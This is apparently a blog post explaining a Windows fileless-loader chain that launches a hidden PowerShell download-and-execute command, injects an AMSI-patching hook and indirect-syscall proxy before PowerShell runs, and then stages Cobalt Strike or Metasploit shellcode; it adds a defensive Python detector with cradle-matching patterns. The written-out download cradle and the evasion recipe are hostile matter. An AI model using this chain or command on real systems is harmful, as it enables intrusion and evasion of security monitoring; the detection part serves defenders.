Fileless Loader Combinations
To assist in static and dynamic obfuscation of malware via D-Invoke, AMSI patching, and BeaconGate-like Techniques
Disclaimer: So, I have written two articles in a LinkedIn Post as well as proof on VirusTotal of my attack. But I’ve been weighing this in my head for about two days, and I have chosen to deliberately keep the technique non-actionable without coding skills. The reason why is I have a prediction that this can really go off the rails really quickly, since all it requires is some form of command line access—either through a spearphishing attack, like a link shortcut, an MSI installer, or a common exploit.
+--------------------------------------------------------------------+
| STEPS FOR “FILELESS LOADER” ATTACK CHAIN                           |
+--------------------------------------------------------------------+

+--------------------------------------------------------------------+
| 1. INITIAL EXECUTION (Native C/C++)                                |
| - Attacker runs a compiled C executable.                           |
| - Why C? Native code is not initially evaluated by AMSI.           |
+--------------------------------------------------------------------+
                                  |
                                  | Calls CreateProcess(CREATE_SUSPENDED)
                                  V
+--------------------------------------------------------------------+
| 2. CREATE SUSPENDED PROCESS                                        |
| - Target process: powershell.exe                                   |
| - Arguments: -NoProfile -WindowStyle Hidden -Command [IEX download]|
| - STATUS: Process is created but has no running threads yet.       |
+--------------------------------------------------------------------+
                                  |
                                  | The C executable performs injections into the
                                  | suspended process memory space.
                                  |
                +-----------------+--------------------+
                |                                      |
                V                                      V
+--------------------------------+    +--------------------------------+
| INJECTION A: AMSI BYPASS       |    | INJECTION B: BEACONGATE        |
| - Inject Thomas Carver’s       |    | - Inject Halo’s Gate +         |
|   AMSI Hook DLL shellcode.     |    |   Indirect Syscalls DLL.       |
| - Action: Hooks AmsiScanBuffer |    | - Action: Proxies ntdll.dll    |
|   to always return “clean”.    |    |   API calls to evade EDR hooks.|
+--------------------------------+    +--------------------------------+
                |                                      |
                +-----------------+--------------------+
                                  |
                                  | The C executable resumes the suspended thread.
                                  V
+--------------------------------------------------------------------+
| 3. RESUME & FIRST STAGE EXECUTION                                  |
| - PowerShell process wakes up.                                     |
| - *CRITICAL:* AMSI is already hooked, and Syscalls are proxied     |
|   before PowerShell starts executing its command.                  |
| - PowerShell executes Invoke-WebRequest | Invoke-Expression.       |
+--------------------------------------------------------------------+
                                  |
                                  | Downloads 2nd stage script from remote URL into memory.
                                  V
+--------------------------------------------------------------------+
| 4. SECOND STAGE: D-INVOKE STAGER                                   |
| - The downloaded PowerShell script runs.                           |
| - It uses C# “D-Invoke” (Dynamic Invocation) with unsafe code      |
|   blocks/function pointers.                                        |
| - Why? D-Invoke itself is not inherently malicious and passes      |
|   static analysis.                                                 |
+--------------------------------------------------------------------+
                                  |
                                  | D-Invoke loads and executes the final shellcode.
                                  V
+--------------------------------------------------------------------+
| 5. FINAL PAYLOAD EXECUTION                                         |
| - The actual malicious payload runs (e.g., Metasploit, Cobalt      |
|   Strike, Rust binary, kernel exploit).                            |
| - *RESULT:* The payload runs undetected by AMSI due to Step 2A,    |
|   and evades user-mode EDR hooks due to Step 2B.                   |
+--------------------------------------------------------------------+
                                  |
                                  V
+--------------------------------------------------------------------+
| 6. POST-EXPLOITATION (Optional/Loud)                               |
| - Further actions must occur within this *same* PowerShell session |
|   to remain protected by the injected hooks.                       |
| - Examples: Credential scraping, installing ZeroTier VPN.          |
+--------------------------------------------------------------------+

And that’s the last part: common exploits. So, a lot of people have dropped exploitation toolkits on GitHub for CVEs that are not well patched. For this reason, in my previous writings about the Velociraptor “Bring Your Own Vulnerability” exploit, I have decided to keep it non-actionable and kind of keep it in a broad, graphical overview.
First, I will start with the actual writing of how it works. And then I will show you graphically how it works, and what you can do with this.
So first, I have the source code. I could give you screenshots of the source code, but I want to make sure this stays non-actionable. You do need to know at least four languages. You need to know languages from C to C#; at least, the .NET interpreter stack, I believe, is the best way to describe it. And so basically you need Visual Studio, or Clang wrapped around Visual Studio.
Now, in testing, what you have to do is create a regular executable in C or a language that you prefer—but I prefer C because native code is not evaluated by AMSI (Antimalware Scan Interface). Your executable will first keep it easy. We’re going to check this first child a bit. What was it? “Infinity AMSI bypasses”—that’s what I called it. And it’s really simple and modular.
Unfortunately, if you use C as an executable or DLL, it will not support arguments, because the second-stage wrapper requires dynamic invocation. It’s not that you cannot support arguments; it’s just that it’s really difficult to do without manual manipulation of the registers and stack, much like binary exploitation. In some ways it is binary exploitation, if you were to do that.
So let’s just take it from the top down. The C or C++ executable executes with these command line parameters:
powershell -NoProfile -WindowStyle Hidden -Command Invoke-WebRequest -Uri [URL] -UseBasicParsing | Invoke-Expression
That’s basically what it does. However, it calls CreateProcess and passes this command line, but creates the process in a suspended state (CREATE_SUSPENDED). There are two reasons. The main reason is to beat a race condition, because the next thing we run, the PowerShell download and Invoke-Expression script (PowerShell, .NET, and C# code), will get evaluated by AMSI.
If you have never tried this before, play around, not with other AMSI bypasses like [Shakajack’s]* method, but with an easier-to-evaluate method made by Thomas Carver over five years ago. It is a better example because it’s very verbose, as long as you didn’t remove the printing of the strings. You’ll see that about every two characters, the Antimalware Scan Interface DLL evaluates what you’re typing and constantly checks it against known malicious signatures.
So that’s why we’re trying to beat the race condition using the CREATE_SUSPENDED flag. While it is suspended, there is no other thread. It doesn’t have threads; it hasn’t started up yet. Neither is the process dead. So we create a second-stage remote process, okay? We inject into the suspended PowerShell process our own DLL shellcode, which is Thomas Carver’s AMSI Hook turned into DLL shellcode, and which automatically hooks AmsiScanBuffer to always evaluate as non-malicious. That was the whole point.
Secondly, we’re going to create a second remote thread from our malicious executable, and this is called BeaconGate. BeaconGate is basically a combination of Halo’s Gate and indirect syscalls, which you may have heard of. This gives you, I guess you could say, a process-wide global proxy for any malicious API call that reaches ntdll.dll, proxying it through an indirect syscall.
And so we have two injected malicious DLLs in PowerShell before PowerShell even starts. Okay? One evaluates all AMSI checks as non-malicious, so you can run any malicious PowerShell command through the script that it will download and execute. And the second one is BeaconGate.
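From a defender’s seat, the sequence described above leaves a distinctive trail in endpoint telemetry: a native parent creates powershell.exe with a hidden-window download cradle, then writes into that child and starts threads in it before PowerShell has logged a single script block. The Python below is an added example, not code from this post or from any tool it names. The event records are constructed inline and loosely modelled on Sysmon event types 1 (ProcessCreate), 8 (CreateRemoteThread) and 10 (ProcessAccess) plus PowerShell script block logging (event 4104); the field names, the loader path, the process IDs and the URL are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Command-line indicators lifted from the launch line quoted in the post.
CRADLE_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download": re.compile(r"invoke-webrequest|\biwr\b|downloadstring", re.I),
    "exec_in_memory": re.compile(r"invoke-expression|\biex\b", re.I),
}

# Process access rights (Windows SDK values) that let one process write into
# another or start a thread in it. A suspended child receiving these from its
# parent is exactly the injection step the post describes.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECTION_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


@dataclass(frozen=True)
class Finding:
    pid: int
    parent_image: str
    cradle_indicators: Tuple[str, ...]
    injections_before_first_scriptblock: int
    first_scriptblock_ts: Optional[float]


def is_powershell(image: str) -> bool:
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower() in POWERSHELL_IMAGES


def cradle_indicators(command_line: str) -> Tuple[str, ...]:
    return tuple(name for name, rx in CRADLE_PATTERNS.items() if rx.search(command_line))


def detect_prehooked_powershell(events: Iterable[dict]) -> List[Finding]:
    """Report powershell.exe processes that were launched with a download cradle
    and/or had memory written or threads created in them by another process
    before they logged their first script block (i.e. before they ran anything)."""
    ordered = sorted(events, key=lambda e: e["ts"])
    creates = {e["pid"]: e for e in ordered
               if e["event_id"] == 1 and is_powershell(e["image"])}
    first_scriptblock: Dict[int, float] = {}
    for e in ordered:
        if e["event_id"] == 4104:
            first_scriptblock.setdefault(e["pid"], e["ts"])

    findings: List[Finding] = []
    for pid, create in creates.items():
        indicators = cradle_indicators(create["command_line"])
        cutoff = first_scriptblock.get(pid)  # None: PowerShell never ran a script block
        injections = 0
        for e in ordered:
            if e.get("target_pid") != pid or e["ts"] < create["ts"]:
                continue
            if cutoff is not None and e["ts"] >= cutoff:
                continue  # activity after PowerShell started is out of scope here
            if e["event_id"] == 8:  # CreateRemoteThread into the child
                injections += 1
            elif e["event_id"] == 10 and int(e["granted_access"], 16) & INJECTION_RIGHTS:
                injections += 1  # ProcessAccess with write/thread rights
        if len(indicators) >= 2 or injections:
            findings.append(Finding(pid, create["parent_image"], indicators,
                                    injections, cutoff))
    return findings


# Constructed sample telemetry (hypothetical pids, paths and URL).
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Benign: user opens PowerShell from Explorer; nothing touches its memory.
    {"ts": 1.0, "event_id": 1, "pid": 4100, "ppid": 900, "image": PS_IMAGE,
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "powershell.exe"},
    {"ts": 1.5, "event_id": 4104, "pid": 4100},
    # Suspicious: a tool in the user's temp folder starts a hidden PowerShell with
    # the cradle from the post, gets write/thread access to it, starts two remote
    # threads, and only afterwards does PowerShell log its first script block.
    {"ts": 2.0, "event_id": 1, "pid": 5200, "ppid": 5100, "image": PS_IMAGE,
     "parent_image": r"C:\Users\demo\AppData\Local\Temp\loader.exe",
     "command_line": "powershell -NoProfile -WindowStyle Hidden -Command "
                     "Invoke-WebRequest -Uri http://example.invalid/stage2 "
                     "-UseBasicParsing | Invoke-Expression"},
    {"ts": 2.1, "event_id": 10, "src_pid": 5100, "target_pid": 5200, "granted_access": "0x1FFFFF"},
    {"ts": 2.2, "event_id": 8, "src_pid": 5100, "target_pid": 5200},
    {"ts": 2.3, "event_id": 8, "src_pid": 5100, "target_pid": 5200},
    {"ts": 2.9, "event_id": 4104, "pid": 5200},
]

if __name__ == "__main__":
    for f in detect_prehooked_powershell(SAMPLE_EVENTS):
        print(f"pid {f.pid} from {f.parent_image}: cradle={f.cradle_indicators}, "
              f"injections before first script block={f.injections_before_first_scriptblock}")
```

The ordering check is the important part: a ProcessAccess or CreateRemoteThread event into powershell.exe is common from legitimate tooling once the shell is running, but one that lands between process creation and the first script block is the window this chain depends on. Scoring the command line separately means a cradle launched without injection still surfaces, and an injected process launched with a clean-looking command line still surfaces.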
Finally, we’re going to convert this executable into a DLL, and then we’re going to use Monoxgas’s sRDI (Shellcode Reflective DLL Injection) to turn this into Position Independent DLL shellcode.
With that done, we rename it and add this entire malicious DLL, which performs these two injections and runs the malicious command, into a dynamically invoked PowerShell script. Why do we use dynamic invocation (D-Invoke)? Because dynamic invocation by itself is not malicious. It is, or will be, flagged malicious if you keep adding malicious code to it. But by itself, a C# unsafe code block combined with unmanaged function pointer delegates, otherwise known as a safely typed pointer in C#, that calls into and invokes shellcode is not malicious.
But if you were to add malicious commands after it, the way AMSI works is that it evaluates the entire script, and it can flag on that. So when you have a D-Invoke stager, which is what we have turned our fileless loader into now, it will not flag, because legitimate IT operations can legitimately use D-Invoke for things like automatic configuration, or just for running a binary and deploying it across their entire domain in an enterprise environment. So by itself, D-Invoke is not malicious.
Now, using this, we can execute any malicious command in PowerShell, because everything is evaluated as non-malicious through the AMSI hook shellcode provided by Thomas Carver and our BeaconGate. So you can run Metasploit shellcode. You can run Cobalt Strike shellcode. You can run a non-obfuscated Rust binary. You can run kernel exploits, assuming the exploit isn’t using something like a kernel wrapper function API call. And that is how the custom BeaconGate, as it is known, works: execution passes through the “gate,” is proxied, and is completed with an indirect syscall.
So that is basically an attack from a top point of view. Let’s see what else I can do from my list.
Now, the rule is that every subsequent PowerShell command has to be within the same PowerShell session. If you invoke PowerShell again in a second-stage script downloaded from the internet to run filelessly, it creates a new PowerShell session and it’s not protected by these injected DLLs. That’s the catch.
But I thought of that; you can automate credential collection, although it’s extremely loud. You can install ZeroTier VPN to create a site-to-site VPN to a hardened Kali Linux box or virtual machine and attack from there directly, instead of having public internet-facing Command and Control infrastructure. But many of these tricks are extremely loud post-compromise, and we have not yet addressed EDR evasion, because this is all user mode. In fact, you don’t even need to be admin to do this. It will just run with whatever privileges the initial fileless loader was started with.
So there are limitations, and I never promised that this is going to wreck everything, but EDR has its own mechanisms, and they must be bypassed separately.

